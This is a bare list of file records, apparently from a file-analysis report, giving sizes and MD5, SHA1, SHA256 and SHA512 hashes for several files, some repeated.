Filesize
1.6MB
MD508e3930a42197a422d064569c4778997
SHA174832aa332b48422e5d448f5099b397e84c18712
SHA256322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368
-
Filesize
1.6MB
MD508e3930a42197a422d064569c4778997
SHA174832aa332b48422e5d448f5099b397e84c18712
SHA256322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83